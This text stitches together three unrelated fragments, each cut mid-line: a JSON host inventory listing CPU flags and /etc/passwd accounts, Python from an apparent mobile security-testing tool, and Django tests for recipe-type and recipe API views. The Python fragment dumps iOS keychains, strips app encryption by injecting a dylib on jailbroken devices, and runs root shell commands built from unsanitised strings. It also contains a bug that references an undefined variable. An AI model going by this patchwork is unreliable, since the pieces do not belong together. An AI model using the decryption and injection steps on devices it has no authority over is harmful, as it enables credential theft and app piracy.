"cache_size": "6144 KB", "physical_id": "0", "core_id": "3", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "total": 8, "real": 1, "cores": 4 }, "etc": { "passwd": { "root": { "dir": "/root", "gid": 0, "uid": 0, "shell": "/bin/bash", "gecos": "root" }, "bin": { "dir": "/bin", "gid": 1, "uid": 1, "shell": "/sbin/nologin", "gecos": "bin" }, "daemon": { "dir": "/sbin", "gid": 2, "uid": 2, "shell": "/sbin/nologin", "gecos": "daemon" }, "adm": { "dir": "/var/adm", "gid": 4, "uid": 3, "shell": "/sbin/nologin", "gecos": "adm" }, "lp": { "dir": "/var/spool/lpd", "gid": 7, "uid": 4, "shell": "/sbin/nologin", "gecos": "lp" }, "sync": { "dir": "/sbin", "gid": 0, "uid": 5, "shell": "/bin/sync", "gecos": "sync" }, "shutdown": { "dir": "/sbin", "gid": 0, "uid": 6, "shell": "/sbin/shutdown", "gecos": "shutdown" }, "halt": { "dir": "/sbin", "gid": 0, "uid": 7, "shell": "/sbin/halt", "gecos": "halt" }, "mail": { "dir": "/var/spool/mail", "gid": 12, "uid": 8, "shell": "/sbin/nologin", "gecos": "mail" }, "operator": { "dir": "/root", "gid": 0, "uid": 11, "shell": "/sbin/nologin", "gecos": "operator" }, "games": { "dir": "/usr/games", "gid": 100, "uid": 12, "shell": "/sbin/nologin", "gecos": "games" }, "ftp": { "dir": "/var/ftp", "gid": 50, "uid": 14, "shell": "/sbin/nologin", "gecos": "FTP User" }, "nobody": { "dir": "/", "gid": 99, "uid": 99, "shell": "/sbin/nologin", "gecos": "Nobody" }, "avahi-autoipd": { "dir": "/var/lib/avahi-autoipd", "gid": 170, "uid": 170, "shell": "/sbin/nologin", "gecos": "Avahi IPv4LL Stack" }, "dbus": { "dir": "/", "gid": 81, "uid": 81, "shell": "/sbin/nologin", "gecos": "System message bus" }, "polkitd": { "dir": "/", "gid": 999, "uid": 999, "shell": "/sbin/nologin", "gecos": "User for polkitd" }, "abrt": { "dir": "/etc/abrt", "gid": 173, "uid": 173, "shell": "/sbin/nologin", "gecos": "" }, "usbmuxd": { "dir": "/", "gid": 113, "uid": 113, "shell": "/sbin/nologin", "gecos": "usbmuxd user" }, "colord": { "dir": "/var/lib/colord", "gid": 998, "uid": 998, "shell": "/sbin/nologin", "gecos": "User for colord" }, "geoclue": { "dir": "/var/lib/geoclue", "gid": 997, "uid": 997, "shell": "/sbin/nologin", "gecos": "User for geoclue" }, "rpc": { "dir": "/var/lib/rpcbind", "gid": 32, "uid": 32, "shell": "/sbin/nologin", "gecos": "Rpcbind Daemon" }, "rpcuser": { "dir": "/var/lib/nfs", "gid": 29, "uid": 29, "shell": "/sbin/nologin", "gecos": "RPC Service User" }, "nfsnobody": { "dir": "/var/lib/nfs", "gid": 65534, "uid": 65534, "shell": "/sbin/nologin", "gecos": "Anonymous NFS User" }, "qemu": { "dir": "/", "gid": 107, "uid": 107, "shell": "/sbin/nologin", "gecos": "qemu user" }, "rtkit": { "dir": "/proc", "gid": 172, "uid": 172, "shell": "/sbin/nologin", "gecos": "RealtimeKit" }, "radvd": { "dir": "/", "gid": 75, "uid": 75, "shell": "/sbin/nologin", "gecos": "radvd user" }, "tss": { "dir": "/dev/null", "gid": 59, "uid": 59, "shell": "/sbin/nologin", "gecos": "Account used by the trousers package to sandbox the tcsd daemon" }, "unbound": { "dir": "/etc/unbound", "gid": 995, "uid": 996, "shell": "/sbin/nologin", "gecos": "Unbound DNS resolver" }, "openvpn": { "dir": "/etc/openvpn", "gid": 994, "uid": 995, "shell": "/sbin/nologin", "gecos": "OpenVPN" }, "saslauth": { "dir": "/run/saslauthd", "gid": 76, "uid": 994, "shell": "/sbin/nologin", "gecos": "\"Saslauthd user\"" }, "avahi": { "dir": "/var/run/avahi-daemon", "gid": 70, "uid": 70, "shell": "/sbin/nologin", "gecos": "Avahi mDNS/DNS-SD Stack" }, "pulse": { "dir": "/var/run/pulse", "gid": 992, "uid": 993, "shell": "/sbin/nologin", "gecos": "PulseAudio System Daemon" }, "gdm": { "dir": "/var/lib/gdm", "gid": 42, "uid": 42, "shell": "/sbin/nologin", "gecos": "" }, "gnome-initial-setup": { "dir": "/run/gnome-initial-setup/", "gid": 990, "uid": 992, "shell": "/sbin/nologin", "gecos": "" }, "nm-openconnect": { "dir": "/", "gid": 989, "uid": 991, "shell": "/sbin/nologin", "gecos": "NetworkManager user for OpenConnect" }, "sshd": { "dir": "/var/empty/sshd", "gid": 74, "uid": 74, "shell": "/sbin/nologin", "gecos": "Privilege-separated SSH" }, "chrony": { "dir": "/var/lib/chrony", "gid": 988, "uid": 990, "shell": "/sbin/nologin", "gecos": "" }, "tcpdump": { "dir": "/", "gid": 72, "uid": 72, "shell": "/sbin/nologin", "gecos": "" }, "some_user": { "dir": "/home/some_user", "gid": 1000, "uid": 1000, "shell": "/bin/bash", "gecos": "some_user" }, "systemd-journal-gateway": { "dir": "/var/log/journal", "gid": 191, "uid": 191, "shell": "/sbin/nologin", "gecos": "Journal Gateway" }, "postgres": { "dir": "/var/lib/pgsql", "gid": 26, "uid": 26, "shell": "/bin/bash", "gecos": "PostgreSQL Server" }, "dockerroot": { "dir": "/var/lib/docker", "gid": 977, "uid": 984, "shell": "/sbin/nologin", "gecos": "Docker User" }, "apache": { "dir": "/usr/share/httpd", "gid": 48, "uid": 48, "shell": "/sbin/nologin", "gecos": "Apache" }, "systemd-network": { "dir": "/", "gid": 974, "uid": 982, "shell": "/sbin/nologin", "gecos": "systemd Network Management" }, "systemd-resolve": { "dir": "/", "gid": 973, "uid": 981, "shell": "/sbin/nologin", "gecos": "systemd Resolver" }, "systemd-bus-proxy": { "dir": "/", "gid": 972, "uid": 980, "shell": "/sbin/nologin", "gecos": "systemd Bus Proxy" }, "systemd-journal-remote": { "dir": "//var/log/journal/remote", "gid": 970, "uid": 979, "shell": "/sbin/nologin", "gecos": "Journal Remote" }, "systemd-journal-upload": { "dir": "//var/log/journal/upload", "gid": 969, "uid": 978, "shell": "/sbin/nologin", "gecos": "Journal Upload" }, "setroubleshoot": { "dir": "/var/lib/setroubleshoot", "gid": 967, "uid": 977, "shell": "/sbin/nologin", "gecos": "" }, "oprofile": { "dir": "/var/lib/oprofile", "gid": 16, "uid": 16, "shell": "/sbin/nologin", "gecos": "Special user account to be used by OProfile" } }, "group": { "root": { "gid": 0, "members": [ ] }, "bin": { "gid": 1, "members": [ ] }, "daemon": { "gid": 2, "members": [ ] }, "sys": { "gid": 3, "members": [ ] }, "adm": { "gid": 4, "members": [ "logcheck" ] }, "tty": { "gid": 5, "members": [ ] }, "disk": { "gid": 6, "members": [ ] }, "lp": { "gid": 7, "members": [ ] }, "mem": { "gid": 8, "members": [ ] }, "kmem": { "gid": 9, "members":
= okey = None for line in result.replace("\r\n", "\n").split("\n"): # Found new item if "--------" in line: if keychain_data: keychain_data[key] = self._translate_keychain_value( "\n".join(value.split("\n")[:-2])) keychain += [keychain_data] keychain_data = {} key = value = okey = None # Look for new key for k in keys: if line.startswith(k): if key: keychain_data[key] = self._translate_keychain_value( value) key = k[:-2].lower().replace(" ", "_") value = line.split(k)[-1] okey = k # if value already parsed because of first line if okey: okey = None else: value = "{}{}\n".format(value, line) return keychain return _keychain_data() def install(self, ipa_file_path): """ Installs an IPA app on the remote device :param str ipa_file_path: the path tot he local IPA file :return: the result of installing the app """ @_requires_ios_binary(self, "appinst") @_requires_ios_package(self, "net.angelxwind.appsyncunified") def _install(ipa_file_path): filename = ipa_file_path.rsplit("/", 1)[-1] remote_ipa_file = "/tmp/{}".format(filename.replace(" ", "_")) # prepare filename ipa_file_path = ipa_file_path.replace(" " , "\ ") self.put(ipa_file_path, remote_ipa_file) result = self.execute( "appinst {}".format(remote_ipa_file))[0] # update app list self.execute("uicache") return result return _install(ipa_file_path) def find_files(self, paths): """ Returns a list of files in the selecged paths :param str paths: the root paths to start looking for files from - these can be seperated by space for multiple file paths :return: list with the found files """ @_requires_ios_binary(self, "find") def _find_files(paths): return self.execute("find {} -type f".format(paths))[0].split("\n") return _find_files(paths) def processes(self): """ Returns a list of running processes, their users and pids :return: a list of dicts of processes """ @_requires_ios_binary(self, "ps") def _processes(): from scrounger.utils.general import remove_multiple_spaces processes_list = [] for process in self.execute("ps aux")[0].split("\n"): if not process: continue process = remove_multiple_spaces(process.strip()) fields = process.split(" ") app_user = fields[0] app_pid = fields[1] # if the app has spaces in the name app_name = " ".join(fields[10:]) processes_list += [{ "name": app_name, "user": app_user, "pid": app_pid }] return processes_list return _processes() def repositories(self): """ Returns a list of repositories added to APT / Cydia :return: a list with the repositories URLS """ @_requires_ios_binary(self, "apt") def _repositories(): repositories_list = [] for line in self.execute( "grep -R deb /etc/apt/sources.list.d/")[0].split("\n"): if line: line_split = line.strip().split(":",1)[-1].split(" ") repositories_list += [line_split[1]] return repositories_list return _repositories() # ************************************************************************** # Applications functions # ************************************************************************** def pid(self, app_id): """ Returns the PID of a running application :param str app_id: the identifier of the app to get the PID from :return int: a PID if the app with app_id is running or None if not """ apps = self.apps() if app_id not in apps: _Log.debug("App {} is not installed on the device".format(app_id)) return None install_path = apps[app_id]["application"] processes = self.processes() for process in processes: if install_path.rsplit("/", 1)[-1].lower() in \ process["name"].lower(): return int(process["pid"]) return None def stop(self, app_id): """ Kills an application on the connected device :param str app_id: the application identifier :return: nothing """ pid = self.pid(app_id) if pid: self.execute("kill -9 {}".format(pid)) def start(self, app_id): """ Starts an application on the connected device :param str app_id: the application identifier :return: the result of opening the app """ # com.conradkramer.open # iOS 11 - https://github.com/GaryniL/Open/releases # https://github.com/insidegui/launchapp/ bundled in listapps @_requires_ios_binary(self, "listapps") def _start(app_id): return self.execute("listapps -o {}".format(app_id)) return _start(app_id) def pull_data_contents(self, data_path, local_path): """ Gets an application's data from the device to a local path :param str data_path: the path to the application's data :param str local_path: the destination path :return: nothing """ @_requires_ios_binary(self, "find") def _pull_data_contents(data_path, local_path): #from scrounger.utils.general import execute data_files = self.execute("find {} -type f".format(data_path))[0] for data_file in data_files.split("\n"): local_file_path = "{}{}".format(local_path, data_file.replace(data_path, "")) # NO NEED TO DO IT - get is now responsible for it # create destination folders if they don't exist #execute("mkdir -p {}".format( # local_file_path.rsplit("/", 1)[0])) # copy files self.get(data_file, local_file_path) return _pull_data_contents(data_path, local_path) def decrypt_binary(self, app_id): """ Decrypt the binary of the application only :param str app_id: the application identifier of the app to decrypt :return: returns the remote path where the application was decrypted to or None if it failed """ output = self._decrypt_app_helper(app_id, "-b") if "Finished dumping" in output: return "{}/{}".format(output.rsplit(" to ", 1)[1].split("\n")[0], app_id) return None def decrypt(self, app_id): """ Decrypt the binary of the application and packs the application into an ipa file :param str app_id: the application identifier of the app to decrypt :return: returns the remote path where the application was packed into or None if it failed """ output = self._decrypt_app_helper(app_id, "-d") if "DONE: " in output: return output.split("DONE: ", 1)[1].split("\n")[0] return None def _uncrypt_app_helper(self, app_id, decrypt_type): """ Decrypts an app using uncrypt11 and returns the result output :param str app_id: the id of the app to be decrypted :param str decrypt_type: the type of decryption to be done - either binary only (-b) or packed into ipa (-d) :return: returns the output of the decryption """ from time import sleep uncrypt_path = "/Library/MobileSubstrate/DynamicLibraries/\ uncrypt11.dylib" if not self.file_exists(uncrypt_path): _Log.debug("Uncrypt11 not found") return "FAIL: Uncrypt11 not installed." self.start(app_id) # start app - needs to be running sleep(5) # wait to start pid = self.pid(app_id) # get pid if not pid: _Log.debug("PID not found") return "FAIL: Could not get PID of {}".format(app_id) result = self.execute("/electra/inject_criticald {} {}".format( pid, uncrypt_path)) if "No error occured!" not in result[0] and \ "No error occured!" not in result[1]: _Log.debug("Not decrypted:\n{}\n{}".format(result[0], results[1])) return "FAIL: An error occured trying to decrypt {}".format(app_id) list_apps = self.apps() app_info = list_apps[app_id] decrypted_binary = "{}/Documents/{}\ decrypted".format( app_info["data"], app_info["binary_name"]) if not self.file_exists(decrypted_binary): _Log.debug("File {} does not exist".format(decrypted_binary)) return "FAIL: Could not decrypt {}".format(app_id) # move binary to tmp end_path = "/tmp/{}.decrypted".format(app_id) self.execute("mv {} {}".format(decrypted_binary, end_path)) if decrypt_type == "-b": _Log.debug("Dumpped binary") return "Finished dumping {} to {}\n".format(app_id, end_path) _Log.debug("Creating IPA") # create IPA scructure self.execute("rm -rf /tmp/scrounger-tmp/Payload") self.execute("mkdir -p /tmp/scrounger-tmp/Payload") # copy App to /tmp self.execute("cp -r {} /tmp/scrounger-tmp/Payload".format( app_info["application"])) # move decrypted binary to the Payload app_name = app_info["application"].rsplit("/", 1)[-1] self.execute("mv {} /tmp/scrounger-tmp/Payload/{}/{}".format( end_path, app_name, app_info["binary_name"])) # zip everything self.execute("cd /tmp/scrounger-tmp; zip -r ../{}.ipa Payload/".format( app_id)) # cleanup self.execute("rm -rf /tmp/scrounger-tmp") # Success: DONE: /path/to/ipa\n # Success: Finished dumping app_id to /path/to/dump/binary\n return "DONE: /tmp/{}.ipa\n".format(app_id) def _decrypt_app_helper(self, app_id, decrypt_type): """ Decrypts an app and returns the result output :param str app_id: the id of the app to be decrypted :param str decrypt_type: the type of decryption to be done - either binary only (-b) or packed into ipa (-d) :return: returns the output of the decryption """ @_requires_ios_binary(self, "clutch") def _clutch_decrypt_app_helper(app_id, decrypt_type): from socket import timeout scrounger_clutch_log_file = "/tmp/scrounger-clutch.log" try: output = self.execute("clutch -n {} {} &> {}".format( decrypt_type, app_id, scrounger_clutch_log_file))[0] except timeout: _Log.debug("ssh command timedout.") output = self._cat_file(scrounger_clutch_log_file) # cleanup log file self._rm_file(scrounger_clutch_log_file) return output ios_version = self.system_version() if ios_version.startswith("11."): return self._uncrypt_app_helper(app_id, decrypt_type) # ios < 11 use clutch return _clutch_decrypt_app_helper(app_id, decrypt_type) from scrounger.utils.android import _adb_command class AndroidDevice(BaseDevice): """ This class will be used as a bridge between the host and the android device """ _device_id = None def __init__(self, device_id): """ Creates an object that will be a wrapper to interact with the android device. It also checks if the device trusts the host. """ from scrounger.utils.android import devices from scrounger.utils.general import UnauthorizedDevice self._device_id = device_id devices_list = devices() if self._device_id not in devices_list or\ devices_list[self._device_id] == "unauthorized": raise UnauthorizedDevice( "The device {} does not trust this host.".format( self._device_id)) def __str__(self): """Returns a string representation of the device""" return "Android Device ({})".format(self.device_id()) def device_id(self): """ Returns the device ID """ return self._device_id def execute(self, command): """ Executes a command on the target device :param str command: the command to be executed :return: stdout and stderr of the executed command """ # log command that is going to be run _Log.debug("Running: {}".format(command)) return _adb_command("-s {} shell {}".format(self._device_id, command)) def root_execute(self, command, single_quoted=True): """ Executes a command on the target device as root :param str command: the command to execute :return: stdout and stderr from the executed command """ @_requires_android_binary(self, "su") def _root_execute(command, single_quoted): if single_quoted: command = "'{}'".format(command.replace("'", "\'")) return self.execute("su -c {}".format(command)) return _root_execute(command,
self.job_type2.name, 'job_type_version': self.job_type2.version, 'job_type_revision': self.job_type2.revision_num}}}} json_data = { 'name': 'not-a-name', 'definition': new_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertTrue(results['is_valid']) warnings = [] self.assertDictEqual(results, {u'errors': [], u'is_valid': True, u'warnings': warnings, u'diff': {}}) def test_mismatched_warning(self): """Tests validating a new recipe type.""" main_definition = copy.deepcopy(recipe_test_utils.RECIPE_DEFINITION) main_definition['input']['files'][0]['media_types'] = ['image/tiff'] main_definition['nodes']['node_a']['node_type']['job_type_name'] = self.job_type2.name main_definition['nodes']['node_a']['node_type']['job_type_version'] = self.job_type2.version main_definition['nodes']['node_a']['node_type']['job_type_revision'] = self.job_type2.revision_num main_definition['nodes']['node_b']['node_type']['job_type_name'] = self.job_type2.name main_definition['nodes']['node_b']['node_type']['job_type_version'] = self.job_type2.version main_definition['nodes']['node_b']['node_type']['job_type_revision'] = self.job_type2.revision_num main_definition['nodes']['node_d']['node_type']['recipe_type_name'] = self.recipe_type1.name main_definition['nodes']['node_d']['node_type']['recipe_type_revision'] = self.recipe_type1.revision_num json_data = { 'definition': main_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertTrue(results['is_valid']) warnings = [{u'name': u'MISMATCHED_MEDIA_TYPES', u'description': u"Parameter 'INPUT_IMAGE' might not accept [image/tiff]"}] self.assertDictEqual(results, {u'errors': [], u'is_valid': True, u'warnings': warnings, u'diff': {}}) def test_recipeception(self): """Tests validating a recipe type with a sub-recipe of itself""" main_definition = self.recipe_type1.get_v6_definition_json() main_definition['nodes']['recipetype_1'] = { 'dependencies': [], 'input': {}, 'node_type': { 'node_type': 'recipe', 'recipe_type_name': self.recipe_type1.name, 'recipe_type_revision': self.recipe_type1.revision_num } } json_data = { 'name': self.recipe_type1.name, 'definition': main_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertFalse(results['is_valid']) error_msg = u'Recipe type %s contains sub-recipes of itself. Found within recipe type %s.' % (self.recipe_type1.name, self.recipe_type1.name) error = [{u'name': u'RECURSIVE_SUBRECIPES', u'description': error_msg}] self.assertEqual(results['errors'], error) # recipeceiption more than one layer in: A -> B -> A sub_definition = copy.deepcopy(self.sub_definition) sub_definition['nodes']['recipetype_1'] = { 'dependencies': [], 'input': {}, 'node_type': { 'node_type': 'recipe', 'recipe_type_name': self.recipe_type1.name, 'recipe_type_revision': self.recipe_type1.revision_num } } subrecipe_type = recipe_test_utils.create_recipe_type_v6(definition=sub_definition, name='sub-sub-recipe', title='Sub Sub Recipe', description="A sub sub recipe", is_active=False, is_system=False) main_definition = self.recipe_type1.get_v6_definition_json() main_definition['nodes']['sub_sub'] = { 'dependencies': [], 'input': {}, 'node_type': { 'node_type': 'recipe', 'recipe_type_name': subrecipe_type.name, 'recipe_type_revision': subrecipe_type.revision_num } } json_data = { 'name': self.recipe_type1.name, 'definition': main_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertFalse(results['is_valid']) error_msg = u'Recipe type %s contains sub-recipes of itself. Found within recipe type %s.' % (self.recipe_type1.name, subrecipe_type.name) error = [{u'name': u'RECURSIVE_SUBRECIPES', u'description': error_msg}] self.assertEqual(results['errors'], error) class TestRecipesViewV6(APITransactionTestCase): api = 'v6' def setUp(self): django.setup() rest.login_client(self.client, is_staff=True) self.date_1 = datetime.datetime(2016, 1, 1, tzinfo=utc) self.date_2 = datetime.datetime(2016, 1, 2, tzinfo=utc) self.date_3 = datetime.datetime(2016, 1, 2, tzinfo=utc) self.date_4 = datetime.datetime(2016, 1, 3, tzinfo=utc) self.s_class = 'A' self.s_sensor = '1' self.collection = '12345' self.task = 'abcd' self.s_class2 = 'B' self.s_sensor2 = '2' self.collection2 = '123456' self.task2 = 'abcde' manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST) manifest['job']['name'] = 'scale-batch-creator' self.job_type1 = job_test_utils.create_seed_job_type(manifest=manifest) self.jt2 = job_test_utils.create_seed_job_type(manifest=job_test_utils.MINIMUM_MANIFEST) def_v6_dict_sub = {'version': '6', 'input': { 'files': [], 'json': []}, 'nodes': {'node_a': {'dependencies': [], 'input': {}, 'node_type': {'node_type': 'job', 'job_type_name': self.jt2.name, 'job_type_version': self.jt2.version, 'job_type_revision': self.jt2.revision_num}}}} self.sub = recipe_test_utils.create_recipe_type_v6(definition=def_v6_dict_sub) def_v6_dict = {'version': '6', 'input': {'files': [{'name': 'INPUT_FILE', 'media_types': ['image/tiff'], 'required': True, 'multiple': True}], 'json': [{'name': 'INPUT_JSON', 'type': 'string', 'required': True}]}, 'nodes': {'node_a': {'dependencies': [], 'input': {'INPUT_FILE': {'type': 'recipe', 'input': 'INPUT_FILE'}, 'INPUT_JSON': {'type': 'recipe', 'input': 'INPUT_JSON'}}, 'node_type': {'node_type': 'job', 'job_type_name': self.job_type1.name, 'job_type_version': self.job_type1.version, 'job_type_revision': 1}}, 'node_b': {'dependencies': [], 'input': {}, 'node_type': {'node_type': 'recipe', 'recipe_type_name': self.sub.name, 'recipe_type_revision': self.sub.revision_num}} } } self.workspace = storage_test_utils.create_workspace() self.file1 = storage_test_utils.create_file(workspace=self.workspace, file_size=104857600.0, source_started=self.date_1, source_ended=self.date_2, source_sensor_class=self.s_class, source_sensor=self.s_sensor, source_collection=self.collection, source_task=self.task) self.file2 = storage_test_utils.create_file(workspace=self.workspace, file_size=104857600.0, source_started=self.date_3, source_ended=self.date_4, source_sensor_class=self.s_class2, source_sensor=self.s_sensor2, source_collection=self.collection2, source_task=self.task2) self.data = {'version': '6', 'files': {'INPUT_FILE': [self.file1.id]}, 'json': {'INPUT_JSON': 'hello'}} self.data2 = {'version': '6', 'files': {'INPUT_FILE': [self.file2.id]}, 'json': {'INPUT_JSON': 'hello2'}} self.recipe_type = recipe_test_utils.create_recipe_type_v6(name='my-type', definition=def_v6_dict) self.recipe1 = recipe_test_utils.create_recipe(recipe_type=self.recipe_type, input=self.data) self.recipe_type2 = recipe_test_utils.create_recipe_type_v6(name='my-type2', definition=def_v6_dict) self.recipe2 = recipe_test_utils.create_recipe(recipe_type=self.recipe_type2, input=self.data2) self.recipe3 = recipe_test_utils.create_recipe(is_superseded=True) recipe_test_utils.process_recipe_inputs([self.recipe1.id, self.recipe2.id, self.recipe3.id]) def test_successful_all(self): """Tests getting recipes""" url = '/%s/recipes/' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 5) # check new/removed fields for result in results['results']: if result['id'] == self.recipe1.id: self.assertIn('recipe', result) self.assertIn('batch', result) self.assertEqual(result['input_file_size'], 100.0) self.assertEqual(result['source_started'], '2016-01-01T00:00:00Z') self.assertEqual(result['source_ended'], '2016-01-02T00:00:00Z') self.assertEqual(result['source_sensor_class'], self.s_class) self.assertEqual(result['source_sensor'], self.s_sensor) self.assertEqual(result['source_collection'], self.collection) self.assertEqual(result['source_task'], self.task) self.assertEqual(result['jobs_total'], 2) self.assertEqual(result['jobs_pending'], 0) self.assertEqual(result['jobs_blocked'], 0) self.assertEqual(result['jobs_queued'], 2) self.assertEqual(result['jobs_running'], 0) self.assertEqual(result['jobs_failed'], 0) self.assertEqual(result['jobs_completed'], 0) self.assertEqual(result['jobs_canceled'], 0) self.assertEqual(result['sub_recipes_total'], 1) self.assertEqual(result['sub_recipes_completed'], 0) self.assertFalse(result['is_completed']) self.assertNotIn('root_superseded_recipe', result) self.assertNotIn('superseded_by_recipe', result) else: id = result['id'] if result['recipe']: id = result['recipe']['id'] self.assertTrue(id in [self.recipe1.id, self.recipe2.id]) else: self.assertTrue(id in [self.recipe2.id, self.recipe3.id]) def test_time_successful(self): """Tests successfully calling the get recipes by time""" yesterday = timezone.now().date() - timezone.timedelta(days=1) yesterday = yesterday.isoformat() + 'T00:00:00Z' today = timezone.now().date() today = today.isoformat() + 'T00:00:00Z' tomorrow = timezone.now().date() + timezone.timedelta(days=1) tomorrow = tomorrow.isoformat() + 'T00:00:00Z' url = '/%s/recipes/?started=%s&ended=%s' % (self.api, today, tomorrow) response = self.client.get(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) results = result['results'] self.assertEqual(len(results), 5) url = '/%s/recipes/?started=%s&ended=%s' % (self.api, yesterday, today) response = self.client.get(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) results = result['results'] self.assertEqual(len(results), 0) def test_source_time_successful(self): """Tests successfully calling the get recipes by source time""" url = '/%s/recipes/?source_started=%s&source_ended=%s' % (self.api, '2016-01-01T00:00:00Z', '2016-01-02T00:00:00Z') response = self.client.get(url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) results = result['results'] self.assertEqual(len(results), 1) for result in results: self.assertTrue(result['id'] in [self.recipe1.id]) def test_source_sensor_class(self): """Tests successfully calling the recipes view filtered by source sensor class.""" url = '/%s/recipes/?source_sensor_class=%s' % (self.api, self.s_class) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_sensor_class'], self.s_class) def test_source_sensor(self): """Tests successfully calling the recipes view filtered by source sensor.""" url = '/%s/recipes/?source_sensor=%s' % (self.api, self.s_sensor) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_sensor'], self.s_sensor) def test_source_collection(self): """Tests successfully calling the recipes view filtered by source collection.""" url = '/%s/recipes/?source_collection=%s' % (self.api, self.collection) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_collection'], self.collection) def test_source_task(self): """Tests successfully calling the recipes view filtered by source task.""" url = '/%s/recipes/?source_task=%s' % (self.api, self.task) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) result = json.loads(response.content) self.assertEqual(len(result['results']), 1) self.assertEqual(result['results'][0]['source_task'], self.task) def test_successful_id(self): """Tests getting recipes by id""" url = '/%s/recipes/?recipe_id=%s' % (self.api, self.recipe1.id) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['id'], self.recipe1.id) def test_successful_recipe_type_id(self): """Tests getting recipes by type id""" url = '/%s/recipes/?recipe_type_id=%s' % (self.api, self.recipe_type.id) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['recipe_type']['id'], self.recipe_type.id) def test_successful_recipe_type_name(self): """Tests getting recipes by type name""" url = '/%s/recipes/?recipe_type_name=my-type' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['recipe_type']['name'], 'my-type') def test_successful_batch(self): """Tests getting recipes by batch id""" batch = batch_test_utils.create_batch() self.recipe1.batch_id = batch.id self.recipe1.save() url = '/%s/recipes/?batch_id=%d' % (self.api, batch.id) response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) self.assertEqual(results['results'][0]['recipe_type']['id'], self.recipe_type.id) def test_successful_superseded(self): """Tests getting superseded recipes""" url = '/%s/recipes/?is_superseded=true' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 1) url = '/%s/recipes/?is_superseded=false' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 4) def test_successful_completed(self): """Tests getting completed recipes""" url = '/%s/recipes/?is_completed=true' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 0) url = '/%s/recipes/?is_completed=false' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['count'], 5) def test_successful_order(self): """Tests ordering recipes""" url = '/%s/recipes/?order=-source_sensor_class' % self.api response = self.client.generic('GET', url) self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertEqual(results['results'][4]['source_sensor_class'], 'A') class TestRecipesPostViewV6(APITransactionTestCase): api = 'v6' def setUp(self): django.setup() rest.login_client(self.client, is_staff=True) self.workspace = storage_test_utils.create_workspace() self.source_file = source_test_utils.create_source(workspace=self.workspace) self.jt1 = job_test_utils.create_seed_job_type() self.jt2 = job_test_utils.create_seed_job_type() self.def_v6_dict = {'version': '6', 'input': { 'files': [{'name': 'INPUT_IMAGE', 'media_types': ['image/tiff'], 'required': True, 'multiple': True}], 'json': []}, 'nodes': {'node_a': {'dependencies': [], 'input': {'INPUT_IMAGE': {'type': 'recipe', 'input': 'INPUT_IMAGE'}}, 'node_type': {'node_type': 'job', 'job_type_name': self.jt1.name, 'job_type_version': 